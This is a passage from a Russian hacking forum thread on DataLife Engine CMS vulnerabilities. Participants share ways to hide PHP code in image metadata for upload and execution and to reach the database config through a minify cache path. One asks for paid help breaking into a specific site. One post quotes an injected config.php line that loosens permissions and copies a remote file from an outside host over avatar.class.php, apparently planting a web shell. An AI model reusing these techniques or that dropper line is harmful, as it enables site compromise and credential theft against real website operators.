[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    здесь вопрос простой: если сервер работает на голом апач и права на файл .htaccess 444, ничего не выйдет. Нужен или фтп, или "сосед" или заливка туда, где нет запрета на пхп (нет хтаксс)

    а вот, например, апач + мод_реврайт (как многие любят, типы быстро), группа вэб имеет права по умолчанию на запись в диры и файлы. потому и убить его можно, методами описанными выше (или через /inc/files.php (вопрос версии) или через анимашку)
     
    #301 slva2000, 12 Feb 2014
    Last edited: 12 Feb 2014
  2. mr.Arec

    mr.Arec New Member

    Joined:
    18 Apr 2013
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    через сторонний модуль
     
  3. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    slva2000 с версии 9.7 уже не робит

    mr.Arec чё за модуль?
     
  4. FreddieVR

    FreddieVR New Member

    Joined:
    13 Jan 2014
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.
     
  5. gas896

    gas896 Banned

    Joined:
    29 Jan 2014
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Как юзать?
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Откройте исходный код картинки и вместо метатегах вставите свой php код, и целостность картинки сохранится и код будет.

    DLE кишит возможностями заливки файлов и выполнением произвольного кода, анализируйте внимательней исходники...

    Блин вот буквально сегодня искал баги в исходниках DLE и нашел одну из этих строк, а она уже в паблике(((
     
    _________________________
    #306 winstrool, 19 Feb 2014
    Last edited: 19 Feb 2014
  7. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    таки я вкурсе, мне интересно что другие нашли :D
    и искать баги в старых версиях как то не кошерно :cool:
     
  8. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    а как это багу с minify провернуть чтоб dbconfig увидеть по этому адресу :)
    Code:
    ./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e9736c
     
  9. FreddieVR

    FreddieVR New Member

    Joined:
    13 Jan 2014
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Никак. $realpath = realpath($path); NULL не канает.
     
  10. FreddieVR

    FreddieVR New Member

    Joined:
    13 Jan 2014
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Мужики, подскажите хотя бы в каком направлении копать. Уязвимость с аватаркой, похоже, тоже уже пофиксили. gif-ки льются статическими, код из всех картинок режется. Может быть кто-то за вознаграждение поможет?
     
  11. Donnel

    Donnel New Member

    Joined:
    20 Feb 2014
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Короче говоря. Есть программа - Teleport Pro для закачки сайтов. Все наверняка заметили, что она не скачивает php файлы. Я попробовал указать папку site.ru/engine, и он обиделся и выдал 403 Forbidden. Но! Когда я ввел путь к конкретному файлу, то он как миленький его скачал. Но в формате html. Я не огорчился, порылся в настройках - и опля! Он скачал мне оригинальный php. Я уже выкачал с одного сайта таким образом форум и админку за просто так. Но умные админы переименовывают важнейшие файлы типа dbconfig, а админ там очень умный. Так что единственное, что требуется - раскрытие путей. Кто знает безболезненный способ? Версия известна - 9.0 Final, но, как я уже говорил, админы там умные и пофиксили большинство дыр патчами. Да, есть вероятность, что они сидят на nulled, но не уверен, да и сомнительно: сайт раскручен достаточно, так что будь он на нулевке, его бы ломанули. И все же, и все же...
    P. S.: Кто не верит - могу приложить скриншоты.
    P. P. S.: Да, чуть не забыл: еще я смог выкачать файл .htaccess, но не знаю, как он мне поможет - да, я чайник, можно и так сказать.
     
  12. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Хе-хе-хе. Выложи скриншоты (=
     
    _________________________
  13. Tname

    Tname New Member

    Joined:
    17 Feb 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Юморист! :D
     
  14. Donnel

    Donnel New Member

    Joined:
    20 Feb 2014
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Итак, вот я захожу в телепорт и ввожу полный путь до хтаккеса.
    [​IMG]
    Вот он появился в проекте.
    [​IMG]
    Я запустил скачивание и все, он у меня.
    [​IMG]
    Я даже вот сюда выкладываю СКРИН куска кода, а не сам код.
    [​IMG]
    Теперь админка. Добавляю новый путь.
    [​IMG]
    В этот раз я не лазил особо в настройках, поэтому он сначала скачал более привычные форматы файлов - хтмл, джипег и так далее.
    [​IMG]
    А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом? Я и форум выкачивал, до сих пор пылится, просто не знаю путей до пхп, и он скачивал просто index.html, темы и картинки.​
     
  15. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.
     
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Да. Всё, что ты выкачал не является php исходниками.
    А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.
    http://ru.wikipedia.org/wiki/PHP
    http://habrahabr.ru/post/143331/
     
    _________________________
  17. Donnel

    Donnel New Member

    Joined:
    20 Feb 2014
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?
     
  18. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    вот недавно нашел в config.php , как юзают ..хз
    Code:
    .eval(base64_decode(chmod("engine/modules/", 0777);  chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");  chmod("engine/modules/avatar.class.php", 0404);)),//
     
  19. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки...

    Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.
     
  20. ramauf

    ramauf New Member

    Joined:
    14 Mar 2014
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ахаха ты вы че ламеры вот же
    copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");

    тут походу шелл лежал, подозреваю, что s = shell